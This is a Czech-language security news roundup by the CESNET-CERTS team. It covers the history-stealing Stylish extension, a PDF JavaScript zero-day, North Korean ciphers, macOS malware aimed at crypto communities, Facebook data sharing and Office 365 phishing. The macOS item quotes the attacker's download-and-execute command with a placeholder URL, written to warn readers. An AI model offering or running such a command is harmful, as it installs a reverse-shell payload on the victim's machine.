Hlavní navigace

Postřehy z bezpečnosti: PDF.js tak trochu obráceně

CESNET CERTS

Vykrádání historie prohlížeče záškodnickým rozšířením, úspěšný amatérský malware pro macOS, exploitace s pomocí JavaScriptu v PDF i náhled na to, jak se šifruje v KLDR. To všechno a ještě více v dnešním vydání.

Doba čtení: 4 minuty

Stylové vykrádání historie prohlížeče

Google a Mozilla před několika dny odstranili ze svých úložišť doplňků populární rozšíření Stylish, které bylo nainstalováno v necelých dvou milionech prohlížečů. Rozšíření Stylish nabylo na popularitě, protože uživatelům umožňovalo měnit vzhled stránek pomocí vlastních CSS pravidel. Díky tomu se mohli uživatelé zbavit nepěkných UI prvků, nastavit si na oblíbeném webu tmavé pozadí nebo jiným způsobem modifikovat vzhled webů.

Rozšíření však od ledna 2017 vykrádá historii prohlížeče a společně s unikátním identifikátorem data odesílá na centrální server. Tuto funkcionalitu je možné zakázat, ale ve výchozím nastavení je povolená. Uživatelům je doporučeno rozšíření odinstalovat a nahradit ho alternativou, například rozšířením Stylus.

Čtenáři tohoto článku by měli zpozornět, protože rozšíření bylo opakovaně doporučováno i zde na Rootu.

Situace dále podrobně rozebírá Robert Heaton na svém blogu Stylish browser extension steals all your internet history.

Adobe Acrobat Reader, JavaScript a zero-day zranitelnosti

S trochou nadsázky lze říci, že Adobe Acrobat Reader momentálně kromě vaření kávy umí úplně všechno. Kromě funkcí pro 3D modelování a stahování formulářů z Internetu tedy asi nikoho nepřekvapí, že Adobe Acrobat Reader umí i JavaScript.

Společnosti Microsoft a ESET společným úsilím provedly analýzu PDF souboru obsahujícího do té doby neznámý JavaScript exploit. Soubor PDF byl získán ze služby VirusTotal, kam ho někdo nahrál. Dle slov společnosti Microsoft se jednalo o exploit v rané fázi vývoje, protože zkoumané PDF nespouštělo závadný kód a jednalo se spíše o Proof-of-Concept.

Hezky popsané podrobnosti lze najít na blogu Microsoftu ve článku Taking apart a double zero-day sample discovered in joint hunt with ESET 

Letem světem kryptografií Severní Koreje

O korejském operačním systému Red Star OS je leccos známo. Autoři článku A Brief Look At North Korean Cryptography blíže prozkoumali několik jaderných modulů, které obsahují podomácku vytvořené šifrovací algoritmy.

Jedná se o tři moduly Jipsam1, Jipsam2 a Pilsung. V prvním případě se jedná o lehkou modifikaci AES (každá runda má vlastní S-Box). V druhém případě se jedná o mix AES a RC4. Poslední zkoumaný modul Pilsung je (jak jinak) založen na AES, avšak některé kroky algoritmu jsou více komplexní než čistý AES.

Celkem se tedy jedná o šifry postavené nad známými stavebními bloky v podobně AES, RC4 a SHA-1. Jednotlivé kroky odvozených algoritmů jsou však více dynamické (např. závislost S-Boxu na šifrovacím klíči). Jejich implementace v jaderných modulech však vůbec nebrání útokům postranním kanálem.

macOS malware cílí na komunitu okolo kryptoměn

Malware OSX.Dummy je šířen pomocí Slack a Discord kanálů, kde se útočníci vydávají za administrátory skupin. Uživatele se snaží přesvědčit, aby spustili příkaz ve formě

cd /tmp && curl -s curl $MALICIOUS_URL > script && chmod +x script && ./script

Je na zvážení, zda takový vektor nepovažovat spíše za sociální inženýrství. Amatérismus útočníků dále plyne z faktu, že škodlivý software je napsán v JavaScriptu a ve smyčce se pokouší otevřít reverzní shell s užitím portu 1337.

I přes nevelikou technickou úroveň se patrně jedná o úspěšný útok na uživatele macOS. Stažený malware nevykazuje dle VirusTotal žádné známky záškodnosti. Podrobnosti v článku SANS Crypto community target of MacOS malware.

Facebook se přiznal ke sdílení uživatelských dat s 52 firmami

Slova soukromí a Facebook nejdou dost dobře dohromady. To potvrzuje přiznání Facebooku ke sdílení uživatelských dat nejméně s 52 velkými společnostmi. Převážně se jedná o IT giganty, ale najdou se mezi nimi i společnosti jako UPS nebo Nissan.

Kompletní seznam je dostupný na zpravodajském webu TechCrunch.

Office 365 a phishing

Množství uživatelů cloudové služby Microsoft Office 365 se potýká se zvýšeným počtem podvodných e-mailů. Dle dostupných informací se jedná o útok zevnitř, kdy podvodné e-maily jsou odesílány pomocí napadených kont jiných uživatelů Office 365. Tím pádem odesílaná podvodná pošta pochází z důvěryhodné destinace a není dostatečně odfiltrována pravidly, která jsou primárně určena pro příchozí poštu z Internetu. V momentě, kdy Microsoft nebo správce napadených kont zakročí, je už většinou pozdě, protože podvodným mailům stihli podlehnout další uživatelé a ti se záhy stávají rozesílateli podvodných e-mailů.

Uživatelům, kteří tak ještě neučinili, je doporučeno používat dvoufaktorovou autentizaci.

Více informací k tématu v diskuzi na reddit.com.

Ve zkratce

Bug bounty za 12 tisíc dolarů

Lovec bugů s pseudonymem samwcyo publikoval text, ve kterém podrobně popisuje, jak postupoval při hledání chyb v rámci bug bounty programu. Článek zachycuje jeho lov, který mu ve výsledku přinesl 12 tisíc dolarů. Autor se se čtenáři dělí o několik triků a fint. Více informací v článku The $12,000 Intersection between Clickjacking, XSS, and Denial of Service.

Juniper easter egg

Až se budete nudit, zkuste v Junos napsat show version and haiku

MIF18 tip v článku témata

PoC || GTFO

Již několik let je publikován žurnál Proof-of-concept or Get The F Out, který vtipnou formou publikuje zajímavé postřehy a výtvory z oblasti reverzního inženýrství, exploitace nebo například demoscén. Čtenáři jsou instruování k vytištění žurnálu a nenápadnému zařazení do univerzitních knihoven a dalších míst. Aktuální vydání (varování: 88MB) je dostupné i na několika zrcadlech.

O seriálu

Tento seriál vychází střídavě za pomoci pracovníků Národního bezpečnostního týmu CSIRT.CZ provozovaného sdružením CZ.NIC a bezpečnostního týmu CESNET-CERTS sdružení CESNET.

Našli jste v článku chybu?